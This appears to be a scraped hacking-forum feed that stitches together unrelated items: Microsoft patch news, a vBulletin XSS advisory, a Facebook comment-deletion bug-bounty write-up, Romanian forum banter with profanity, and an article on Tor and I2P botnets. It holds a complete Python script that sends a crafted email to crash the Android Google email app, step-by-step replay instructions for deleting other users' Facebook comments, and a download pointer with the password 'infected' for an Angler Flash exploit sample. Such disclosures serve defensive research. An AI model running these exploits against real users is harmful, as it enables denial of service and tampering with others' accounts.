Aerosol

Microsoft has released three critical security patches, including fixes for flaws in Internet Explorer leaving users open to attack, in its latest Patch Tuesday update. The Internet Explorer update is listed as 'critical' as it could be used to remotely execute code on a victim's system. "This security update resolves one publicly disclosed and 40 privately reported vulnerabilities in Internet Explorer," read Microsoft's advisory. "The most severe of these could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. "An attacker who successfully exploited these vulnerabilities could gain the same user rights as the current user." The remaining 'critical' fixes relate to flaws in Microsoft's Windows Kernel-Mode Driver and Group Policy, some of which can also be remotely exploited. "The most severe of the [kernel] vulnerabilities could allow remote code execution if an attacker convinces a user to open a specially crafted document or visit an untrusted website that contains embedded TrueType fonts," read the advisory. "The [Group Policy] vulnerability could allow remote code execution if an attacker convinces a user with a domain-configured system to connect to an attacker-controlled network." The February Patch Tuesday also included 'important' fixes for Windows, Office, Group Policy and Microsoft's Virtual Machine Manager. These flaws could potentially be exploited for a variety of purposes, including elevation of privileges, information disclosure and security bypasses. Ross Barrett, senior manager of security engineering at Rapid7, highlighted the Virtual Machine Manager update as the most interesting of the 'important' fixes. "Hypervisor and virtual machine management applications are often overlooked in routine patching and can be a challenge for administrators to locate on their network," he said. "Those going to patch may find the system requires an update rollup or other patches prior to this patch being offered, which could hide a vulnerable state." Internet Explorer has been a constant source of security problems over the past year. Researcher David Leo uncovered a new Internet Explorer zero-day vulnerability affecting Windows 7 and Windows 8.1 earlier in February. Microsoft issued 200 updates in 2014 fixing a multitude of bugs in the ageing browser. Source

Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Download

Summary: A bug in the stock Google email application version 4.4.2.0200 has been found. An attacker can remotely perform an Denial Of Service attack by sending a specially crafted email. No interaction from the user is needed to produce the crash just receive the malicious email. The CVE-2015-1574 has been assigned. Version 4.2.2.0200 running on a Samsung Galaxy 4 mini fully updated (19 Jan 2015) is affected. Newer versions 4.2.2.0400 are not affected. Details and proof of concept exploit at: http://hmarco.org/bugs/google_email_app_4.2.2_denial_of_service.html Regards, Hector Marco. http://hmarco.org ---------------- Exploit crash_Android_Google_email_4.2.2.0200.py: #!/usr/bin/python ''' * $FILE: crash_Android_Google_email_4.2.2.0200.py * * $VERSION$ * * Authors: Hector Marco <hecmargi@upv.es> * Ismael Ripoll <iripoll@disca.upv.es> * * Date: Released 07 Jan 2015 * * Attack details: http://hmarco.org * * $LICENSE: * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. ''' import smtplib from smtplib import SMTPException import sys import getopt #### START CONFIGURE ##### smtpServer = "" # set an appropriate SMTP server smtpServerPort = 25 # SMTP port, default 25 #### END CONFIGURE ##### sender = '' receivers = [] def usage(): print '\n$ %s -s sender@email.com -r receiver@email.com\n' % sys.argv[0] sys.exit(2) def smtpNotConfigured(): print '\n[-] Error: Edit this script and set a SMTP server to send emails\n' sys.exit(2) def printHeader(): print "\nEmail Android Google 4.2.2.0200 crasher" print "=======================================" print "Author: Hector Marco <hmarco@hmarco.org>" print "Website: http://hmarco.org" def main(argv): global sender global receivers try: opts, args = getopt.getopt(argv,"hs:r:",["s=","r="]) if len(sys.argv) == 1: usage() except getopt.GetoptError: usage() for opt, arg in opts: if opt == '-h': usage() elif opt in ("-s", "--sender"): sender = arg elif opt in ("-r", "--receiver"): receivers.append(arg) if __name__ == "__main__": printHeader() if len(smtpServer) == 0: smtpNotConfigured() main(sys.argv[1:]) message = "From: Sender <%s>\n" % sender message += "To: Receiver <%s>\n" % receivers[0] message += """Subject: Crash test Content-Type: text/plain Content-Transfer-Encoding: 8BIT Content-Disposition: ; """ print "\n[+] Sending crafted message to: %s" % receivers[0] try: smtpObj = smtplib.SMTP(smtpServer, int(smtpServerPort)); smtpObj.sendmail(sender, receivers, message) print "[+] Malicious email successfully sent." except SMTPException: print "[-] Error: unable to send the email. Invalid SMTP server ???" sys.exit(2) Source

WordPress Easing Slider 2.2.0.6 Cross Site Scripting WordPress Ninja Forms 2.8.8 Cross Site Scripting WordPress Video Gallery 2.7 SQL Injection WordPress Survey And Poll 1.1.7 Blind SQL Injection WordPress Photo Gallery 1.2.5 Unrestricted File Upload WordPress Fusion 1.9.1 Arbitrary File Upload WordPress Image Metadata Cruncher Cross Site Scripting WordPress Image Metadata Cruncher CSRF / XSS WordPress Duplicator 0.5.8 Privilege Escalation

*CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities* Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities Product: vBulletin Forum Vendor: vBulletin Vulnerable Versions: 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4 Tested Version: 5.1.3 4.2.2 Advisory Publication: Feb 12, 2015 Latest Update: Feb 12, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-9469 CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* vBulletin *Product & Version: * vBulletin Forum 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4 *Vendor URL & Download: * vBulletin can be downloaded from here, https://www.vbulletin.com/purchases/ *Product Introduction:* "vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server." "Since the initial release of the vBulletin forum product in 2000, there have been many changes and improvements. Below is a list of the major revisions and some of the changes they introduced. The current production version is 3.8.7, 4.2.2, and 5.1.3." *(2) Vulnerability Details:* vBulletin has a security problem. It can be exploited by XSS attacks. *(2.1) *The vulnerability occurs at "forum/help" page. Add "hash symbol" first. Then add script at the end of it. *References:* http://tetraph.com/security/cves/cve-2014-9469-vbulletin-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/02/cve-2014-9469-vbulletin-xss-cross-site.html https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9469 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9469 https://security-tracker.debian.org/tracker/CVE-2014-9469 http://www.cvedetails.com/cve/CVE-2014-9469/ http://www.security-database.com/detail.php?alert=CVE-2014-9469 http://packetstormsecurity.com/files/cve/CVE-2014-9469 http://www.pentest.it/cve-2014-9469.html http://www.naked-security.com/cve/CVE-2014-9469/ http://www.inzeed.com/kaleidoscope/cves/cve-2014-9469/ http://007software.net/cve-2014-9469/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9469/ https://computertechhut.wordpress.com/2015/02/12/cve-2014-9469/ https://security-tracker.debian.org/tracker/CVE-2014-9469 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing Source

Document Title: =============== Facebook Bug Bounty #23 - Session ID & CSRF Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1432 Facebook Security ID: 10202805822321483 Video: https://www.youtube.com/watch?v=SAr2AGLrBkQ Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/02/03/facebook-security-12500-bug-bounty-reward-security-researcher Release Date: ============= 2015-02-03 Vulnerability Laboratory ID (VL-ID): ==================================== 1432 Common Vulnerability Scoring System: ==================================== 9.1 Product & Service Introduction: =============================== Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website`s membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as `People From Work` or `Close Friends`. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site`s terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade `best-of` list, saying, `How on earth did we stalk our exes, remember our co-workers` birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?` Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013. (Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook ) Abstract Advisory Information: ============================== An independent Vulnerability Laboratory researcher discovered a session manipulation vulnerability and csrf bug in the official Facebook online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-02-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Facebook Product: Framework - Content Management System 2015 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A remote session validation vulnerability and cross site request forgery bug has been discovered in the official Facebook online service web-application. The vulnerability allows to execute functions without secure validation to compromise user content in the online service web-application of facebook. Th vulnerability is located in the comment id and legacy id of the comments function. Remote attackers with low privileged user accounts are able to delete postings of other users without auth. The attacker can intercept the session and exchanged the comment and legacy id to delete or add for example comments. The issue is known as critical and impact a high risk to other user account. To manipulate the attacker needs to intercept the session to manipulate the legacy and comment ids. The security risk of the session validation vulnerability and csrf issue is estimated as critical with a cvss (common vulnerability scoring system) count of 9.1. Exploitation of the vulnerability requires a low privileged application user account and no user interaction. Successful exploitation of the vulnerability results in unauthorized delete or add of user content in the comments function of facebook. Vulnerable Module(s): [+] Comments Vulnerable Parameter(s): [+] comment_id [+] legacy id Proof of Concept (PoC): ======================= The session manipulation vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 01. Login to your facebook account 02. Put a comment anywhere to a random post 03. Remove your comment by usage of the standard function in facebook 04. Capture the headers information on requesting to delete 05. Go to the victim account (any account not friend or there friends) because the issue works to both 06. Like his comment and capture the request by intercepting the values 07. Change your comment id with the victim comment id that you and change the legacy id 08. Replay the tampered request with the manipulated values 09. Now the comment will be unauthorized removed 10. Successful reproduce of the security vulnerability that allows to delete any comment of other users. thanks! Solution - Fix & Patch: ======================= The vulnerability has been patched due to the year 2014 by the facebook developer team. The issue was allowed to release in 2015 Q1. The researcher received a reward amount of 12.500$ by the bug bounty program of the facebook whitehat team. Security Risk: ============== The security risk of the security vulnerability in the facebook framework is estimated as critical. (CVSS 9.1) Credits & Authors: ================== Joe Balhis (https://www.facebook.com/joe.balhis) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

@YloveK nu ( am inceput cu kali )) Off:// si ca sa stii si tu UBUNTU = LINUX ceea ce ai spus tu e irelevant de stupid... "inainte invata sa lucrezi pe Ubuntu si dupa treci pe linux" E ca si cum ai spune ( citez pe marele eusimplu aka phplover ) "Invata intai sa mergi pe BMX si dupa invata sa mergi pe bicicleta" Unde dracu' e logica celor spuse de tine?

Cand ai zis de "Flood" ai dat cu muci-n balta! Eu unul iti recomand Kali Linux. ( dar incearca sa te abtii cu copilarismele de genu flood. ) Serios coaie, serios? IN PULA MEA UBUNTU E O DISTRIBUTIE DE LINUX ( nu mai comentati doar pentru +1, daca stiti ca sunteti paraleli si habar aveti...)

@MazaBoY amicul tau e doar foarte norocos!

Flash exploit from Angler Exploit Kit. Analyzing CVE-2015-0313 - The New Flash Player Zero Day https://www.trustwave.com/Resources/SpiderLabs-Blog/A-New-Zero-Day-of-Adobe-Flash-CVE-2015-0313-Exploited-in-the-Wild Download Pass: infected Source

Introduction Botnets are still considered one of the most dangerous cyber threats. These malicious networks of compromised machines are used by cyber criminals and state-sponsored hackers for numerous activities, including DDoS attacks, spam campaigns, and financial scams. The principal problem for a botmaster is to make a botnet resilient against operations run by law enforcement. For operators it is essential to hide Command and Control servers and network traffic to avoid takeover of the malicious infrastructure. The Tor network offers a privileged environment for botmasters that could exploit the popular anonymizing network to hide the C&C servers. Tor botnets During the Defcon Conference in 2010, security engineer Dennis Brown discussed Tor-based botnets, highlighting pro and cons of the choice to hide C&C servers in the Tor network. The principal advantages of Tor-based botnets are: Availability of Authenticated Hidden Services Availability of Private Tor Networks Possibility of Exit Node Flooding Security researchers use traffic analysis to detect botnet activities and to localize the C&C servers. Typically they do this by using Intrusion Detection Systems and network analyzers. Once they’ve detected a botnet, the researchers and law enforcement have different options to eradicate it: Obscuration of the IP addresses assigned to the C&C server Cleaning of server hosting botnet and of the compromised hosts Domain name revoke Hosting provider de-peered The botnet traffic is routed to the C&C server through the Tor network that encrypts it, making its analysis more difficult. Brown proposed the following two botnet models that exploit the Tor network: “Tor2Web proxy based model” “Proxy-aware malware over Tor network” Tor2Web proxy based model” The routing mechanism relies on the Tor2Web proxy to redirect .onion web traffic. The bot has to connect to the hidden service passing through the Tor2Web proxy pointing to an onion address that identifies the C&C server that remains hidden. The principal problem related to this approach is that it is easy to filter Tor2Web traffic, and a similar configuration could suffer from considerable latencies due to the Tor network that could make a botnet built with this approach unresponsive. “Proxy-aware Malware over Tor network” This approach is based on making use of proxy-aware malware. Due to the absence of the Tor2Web service, the bot agents have to run Tor clients on the infected hosts. The main difference with respect to the first solution is in the requirements for the bot agents and their configuration. Bots need to have SOCKS5 support to reach .onion addresses through the Tor network by loading Tor on the victims’ systems. This second approach is more secure because traffic isn’t routed through a proxy and it is entirely within the Tor network due the direct connection between Bots and C&C servers. This configuration avoids traffic interception from exit nodes that are not involved in the architecture. This approach is more complex from a Bot perspective due to the complexity in managing the SOCKS5 interface and in botnet synchronization. This kind of botnet could be easily detected by the presence of Tor traffic on a network. Strengths and weaknesses of Tor botnets Among the strengths: Botnet traffic masquerades as legitimate Tor traffic Encryption prevents most Intrusion Detection Systems from finding botnet traffic P2P architecture makes botnets more resilient to take down Difficulty for the localization of the command and control servers (C&C) Hidden Services provide a Tor-specific .onion pseudo top-level domain, which is not exposed to possible sinkholing. The operator can easily move around the C&C servers just by re-using the generated private key for the Hidden Service. Among the weaknesses: Complexity of botnet management Risk of botnet fragmentation Latency in the communication Tor botnets: real cases The Skynet botnet One of the first examples of a Tor based botnet is the Skynet botnet that was discovered in December 2012 by experts at G-Data and Rapid7. The bot was a strain of the popular Zeus trojan, which included a Tor client for Windows and a bitcoin mining tool. The researchers at G-Data also reported that Skynet used hidden IRC services with Tor to control the malicious architecture. The Skynet botnet can fulfill different tasks such as mining bitcoin or providing bot agents to involve in illegal activities such as DDoS attacks or spam campaigns. Figure 1 – Tor botnet Mevade botnet Going forward in time, we find the Mevade botnet (a.k.a Sefnit, LazyAlienBiker). In September 2013 it caused a spike in the number of Tor users, which reached 5 million active users. Figure 2 – Tor metrics: Mevade spikes Tor users Authors of Mevade’s Tor variant appear to use the Russian language. The purpose of the botnet was the installation of adware and toolbars onto the victim’s systems, mine Bitcoin and steal sensitive information from the infected PC. Experts at TrendMicro revealed that the Mavade malware had also a “backdoor component and communicates over SSH to remote hosts” that made the agent ideal for data theft. The Atrax crimekit In November 2013, researchers from Danish security firm CSIS discovered a new crimekit, dubbed Atrax, which was sold in the underground market. One of the main features implemented by its authors is the ability to exploit Tor networks to communicate with Command & Control servers. The Atrax crimekit was cheap – it was offered for $250, and among the other features implemented by its authors, there were: Virtual currency mining (Bitcoin mining and Litecoin mining) Browser data extraction Availability of a module to run DDoS attacks that offers complete support for both Full IPv6 and IPv4 and implements principal attack techniques including UDP Flood, TCP Flood, TCP Connect Flood, HTTP Slowloris, and many other methods. Data stealing, including Bitcoin wallets (such as Armory, Bitcoin-Qt, Electrum and Multibit). Figure 3 – Atrax crimekit The Atrax crimekit has a modular structure. The malware includes a series of add-ons that implement the functionalities described. A plugin which implements a data stealer was sold for $110, the form grabber runs for $300, and an experimental add-on for coin mining was sold for $140. It’s interesting to note that the Atrax crimekit was sold with free updates, bug fixes and support. Below a list of standard features present in the Atrax crimekit: Kill Update Download (over Tor), Execute (Commandline-Parameter allowed) Download (over Tor), Execute (Commandline-Parameter allowed) in memory Install Plugin Installation List (A list with all installed applications) 64-bit ZeuS banking trojan using Tor network In December 2013, security researchers at Kaspersky Lab detected a new strain of the popular Zeus trojan. The new variant was designed to operate on 64-bit, and authors enhanced the malicious code with the support of communication through the Tor network. This version of the popular banking trojan also used a web injection mechanism to steal banking credentials from the victim’s browser. It was also able to steal digital certificates and implement a keystrokes feature. The authors implemented a communication mechanism with the C&C server over the Tor network, a feature that makes it more difficult for law enforcement and security firms to track botnets. The 64-bit version of the Zeus banking trojan executes a Tor component, starting the svchost application in suspended mode and then injecting the Tor code into that process, running it in a stealth mode. The malicious traffic was routed through TCP port 9050 and the stolen data were sent to the onion domain with address egzh3ktnywjwabxb [.] onion. “Tor.exe is launched indirectly — ZeuS starts the system svchost.exe application in suspended mode, then injects the tor.exe code into this suspended svchost.exe process, tunes the code to run properly and resumes execution of the suspended svchost,” Tarakanov explains. “As a result, instead of the system svchost.exe, the process actually starts executing tor.exe.” states the blog post published on SecureList. Figure 4 -The Tor utility under the cover of the svchost.exe process creates an HTTP proxy server Another peculiarity of the malware is that it instantiates a hidden service that creates a configuration file for any victims, which includes a unique private key for the service and an exclusive domain. The feature allows the botmaster to control the architecture via Tor. “The botnet operator will be aware of the generated onion domain related to every infected machine as the malware informs the CnC about its tor domain name. So, when an infected machine is online the botnet operator can reach it connecting to its unique onion domain via the Tor network. One purpose of this approach is the remote control of the infected host. For example, one of these ports specifically listens to in the VNC function of ZeuS, obviously meaning that ZeuS provides remote desktop control to the operator via this port,” continues the post. This version of the Zeus trojan was able to trigger its execution after one program within a list of 100 predefined applications is started. ChewBacca financial malware In early 2014 the researchers at RSA discovered a variant of the banking Trojan ChewBacca that was used to steal credit card data from infected POS systems. Also in this case, the botnet was controlled by servers hidden in the Tor network. According to the experts at RSA, the botnet based on the ChewBacca POS variant was used against customers in at least 11 countries (including US, Russia, Canada and Australia) since October 25, 2013. The malware was able to steal credit card data with “keylogger” capabilities or dumping the memory content of POS systems in search for credit card details. The bot is able to collect track 1 and track 2 data of payment card during purchases. “Chewbacca code was compiled with Free Pascal 2.7.1., once executed windows based system, it drops as spoolsv.exe in the startup folder and also drops a copy of Tor 0.2.3.25.” “After execution, the function “P$CHEWBACCA$_$TMYAPPLICATION_$__$$_INSTALL” is called, which drops itself as “spoolsv.exe” into the “Startup folder” (e.g. C:Documents and SettingsAll UsersStart MenuProgramsStartup) and requests the public IP of the victim via a publicly accessible service at http://ekiga.net/ip (which is not related to the malware). Tor is dropped as “tor.exe” to the user-s Temp and runs with a default listing on “localhost:9050?.” Figure 5 – ChewBacca console The Bifrose malware In August 2014, researchers from TrendMicro detected a new variant of the Bifrose malware leveraging on the Tor network. The new variant of the Bifrose backdoor was used in a targeted attack against a device manufacturer. Bifrose has been around for many years, and it is quite easy to acquire in the underground. The malware has a data stealing ability, but it is mostly popular for its keylogging routines. The variant detected by the malware experts at TrendMicro (detected as BKDR_BIFROSE.ZTBG-A – hash 5e2844b20715d0806bfa28bd0ebcba6cbb637ea1) leverages the Tor network to hide communications between the infected machines and the C&C server. “What makes this variant more elusive is its ability of Tor to communicate with its command-and-control [C&C] server,” reports a blog post published by TrendMicro. The Bifrose malware was widely used by cyber criminals. In 2010 a threat actor targeted human resource (HR) personnel of different government offices, including the African Union and the NATO. The Bifrose variant used in the targeted attack on the device manufacturer was able to perform the following operations, as explained in the blog post: Download a file Upload a file Get file details (file size, last modified time) Create a folder Delete a folder Open a file using ShellExecute Execute a command line Rename a file Enumerate all windows and their process IDs Close a window Move a window to the foreground OnionDuke: APT Attacks exploited the Tor Network In November 2014, the experts from F-Secure discovered a link between the crew operating a rogue Tor node used to spread OnionDuke malware and MiniDuke APT. Just a month before, the security researcher Josh Pitts of Leviathan Security Group identified a Russian Tor exit node that was patching the binaries downloaded by the users with malware. The expert reported it to officials of the Tor Project, who flagged the Tor exit node as bad and shut down it. Further investigations on the case revealed that the threat actors that managed the node were serving malware through the explained scheme for more than a year. Figure 7 – OnionDuke infection The bad actors used the Tor exit node to serve a backdoor, dubbed OnionDuke, to the victim’s machine with a man-in-the middle attack in the downloading phase. Security experts at F-Secure discovered that the rogue exit node was tied to the MiniDuke criminal crew. MiniDuke is the name of a sophisticated cyber espionage campaign discovered in 2013 by experts at Kaspersky Lab and Hungary’s Laboratory of Cryptography and System Security (CrySyS). The MiniDuke APT infected dozens of machines at government agencies across Europe. Exploiting a security flaw in Adobe software, the malicious payload is dropped once the victim opens the malicious PDF file. The malware was used by attackers to steal sensitive data from government and high profile entities. The researchers speculated that the level of sophistication and the nature of the chosen targets suggest that the attacks are part of a state-sponsored espionage campaign. According to the experts, “OnionDuke,” the malware spread through the bogus exit node, is a malware different from the ones used in the past by the threat actors behind the MiniDuke crew. It must be noted that all five domains contacted by OnionDuke aren’t dedicated malicious servers. Instead, they are legitimate websites compromised by threat actors. The experts identified different samples of the malware and multiple other components of the OnionDuke malware family, which were designed to execute specific tasks like data stealing. The analysis of the various samples allowed the researchers at F-Secure to discover the link with the MiniDuke gang. The owner of the Command & Control (C&C) server used to control a sample of the OnionDuke backdoor (W32/OnionDuke.A) is the same that was involved in the MiniDuke agent. This circumstance suggests that although OnionDuke and MiniDuke are two separate strains of malware, the threat actors behind them shared the control infrastructure. “One component, however, is an interesting exception. This DLL file (SHA1 d433f281cf56015941a1c2cb87066ca62ea1db37, detected asBackdoor:W32/OnionDuke.A) contains among its configuration data a different hardcoded C&C domain, overpict.com and also evidence suggesting that this component may abuse Twitter as an additional C&C channel. What makes the overpict.com domain interesting, is it was originally registered in 2011 with the alias of ‘John Kasai’. Within a two-week window, ‘John Kasai’ also registered the following domains: airtravelabroad.com, beijingnewsblog.net, grouptumbler.com, leveldelta.com, nasdaqblog.net, natureinhome.com, nestedmail.com, nostressjob.com, nytunion.com, oilnewsblog.com, sixsquare.net and ustradecomp.com. This is significant because the domains leveldelta.com and grouptumbler.com have previously been identified as C&C domains used by MiniDuke,” reports F-Secure in the blog post. CryptoWall Ransomware is resurrected with new features In early 2015, the researchers at Cisco’s Talos group published an analysis of a new variant of Cryptowall ransomware that implements a series of new features, including the exploitation of the Tor anonymity network to hide its command-and-control infrastructure. The new variant of CryptoWall was improved by cyber criminals that applied the necessary modifications to its code to make it resilient to the operation of law enforcement. Cisco’s Talos Security Intelligence and Research Group reported that the new strain of the CryptoWall ramsonware is able to distinguish between 32- and 64-bit architectures and to execute different versions for each and OS, including the newest versions of Mac OS X. “The latest Cryptowall 2.0, utilizes TOR to obfuscate the command and control channel. The dropper utilizes multiple exploits to gain initial access and incorporates anti-vm and anti-emulation checks to hamper identification via sandboxes. The dropper and downloaded Cryptowall binary actually incorporate multiple levels of encryption. One of the most interesting aspects of this malware sample, however, is its capability to run 64 bit code directly from its 32 bit dropper,” states the report. The attack chain starts with a phishing mail that includes the CryptoWall variant in a “.zip” attachment. The compressed archive included an exploit that relies a Microsoft privilege escalation vulnerability (CVE-2013-3660) to compromise the target machine. “CryptoWall 2.0 can be delivered through multiple attack vectors, including email attachments, malicious pdf files and even various exploit kits. In the sample that we analyzed, the dropper utilized CVE-2013-3660, ‘Win32k.sysElevation of Privilege Vulnerability’ to achieve the initial privilege escalation on X86 based machines. This exploit works on 32 bit OSs starting beginning with Vista. The dropper even includes a 64-bit DLL that is able to trigger the exploit in all the vulnerable AMD64 Windows Systems.” This new variant of CryptoWall also implements an anti-VM and anti-emulation check pass that prevents the execution in a virtualized environment for malware analysis. CryptoWall implements a multistep decryption. In the first phase, it decrypts just a first portion of code to check if it is running in a virtualized environment. If it passes the check, it then continues to decrypt. According to the Cisco researchers, the feature could be exploited to prevent the execution of the malware by adding fake entries in the file system that indicate a virtual machine is running. Once it has infected the machine, the sample connects to the Tor Servers with an encrypted SSL connection on port 443 or 9090. The C&C servers discovered by the researchers were using the following Tor URLs: crptarv4hcu24ijv.onion crptbfoi5i54ubez.onion crptcj7wd4oaafdl.onion “Using hardcoded IP address in the PE, the malware connects to the TOR Server with an encrypted SSL connection on port 443 or 9090. After successfully connecting, it starts to generate the Cryptowall domain names using a customized Domain Generation Algorithm (DGA). The algorithm is located at offset + 0x2E9FC.” Citroni ransomware Recently a security researcher analyzed a new ransomware dubbed Critroni, which is being sold in different underground forums. Critroni (aka CTB-Locker) is the name of a new ransomware that has been recently included in the Angler exploit kit. A detailed analysis of the ransomware was posted on “Malware.dontneedcoffee.com” by the French security researcher Kafeine. Critroni implements many functionalities, including the ability to exploit the Tor network to host its command and control. “Placing a server in onion-domain (TOR), close to domain abuse can not be practically impossible to trace the owner and shut down the server. Connection to the server only after encryption of all files. Early Detection is not possible on the traffic, it is impossible to block the work of the locker. Blocking TOR prevents only payment the user, not the program. Analogs are connected to the server until the crypt and can block,” states the ad for the malware. The experts explained that the success of the Critroni ransomware was advantaged by the takedown of the GameOver Zeus managed by law enforcement last year. The botnet in fact was used by cyber criminals to serve CryptoLocker ransomware. Around the same time in mid-June, security researchers began seeing advertisements for the Critroni ransomware on underground forums. The malware was sold for around $3,000. The Critroni agent was initially spread exclusively in Russia; later its presence was detected in many other countries worldwide. Many criminal groups are using Citroni for their extortion activities. They used to serve the ransomware as part of the Angler exploit kit, which serves a spambot on victims’ machines. The spambot module is used by malware authors to drop a couple of other payloads. One of them is Citroni. Critroni encrypts a variety of files on the targeted machine and then displays a dialogue box that demands a payment in Bitcoins in order to decrypt the files. Figure 8 – Citroni ransomware Victims have to pay the ransom within 72 hours. If they haven’t any Bitcoins, the ransomware provides detailed instructions on how to acquire them. I2P botnet: real cases Not only Tor network – CryptoWall 3.0 uses I2P network The Tor network isn’t the only anonymizing network exploited by malware authors to hide their malicious infrastructure. In early 2015 a new version of the infamous CryptoWall ransomware was spotted by Microsoft, just a week after the Cisco’s Talos Security Intelligence and Research Group announced the discovery of a new strain of the same malware that exploits the Tor network. The new variant of CryptoWall ransomware, like others, is distributed via malicious email and through malvertising campaigns. This variant was dubbed by the researchers CryptoWall 3.0 or Win32/Crowti, and it isn’t so different from previous instances. However, the experts noted that the names of the files containing the ransom demand have been changed to “HELP_DECRYPT.” This variant customizes files for each infected machine and provides victims a personalized link to a page that contains includes instructions. The instruction page is still reached through the Tor network. The victims of the CryptoWall 3.0 are given 7 days to pay $500 in Bitcoins if they want to decrypt their documents, but if they don’t pay in 7 days, the ransom increases to $1,000. On January 12, Microsoft identified 288 unique CryptoWall ver. 3.0 infections. “The graph below shows the spike after two days of no activity from 288 unique machines affected by this malware,” reads the post published Microsoft. Figure 9 – Cryptowall ver. 3.0 infections The French researcher Kafeine who analyzed CryptoWall 3.0 reported that the communications to C&C served are encoded with the RC4 cipher. Another feature implemented in the latest variant of the malware is the support of I2P (Invisible Internet Project) for C&C communications. “It seems communication with the C&C are Rc4 encoded (key seems to bealphanum sorted path of the POST ) and using i2p protocol,” said Kafeine. 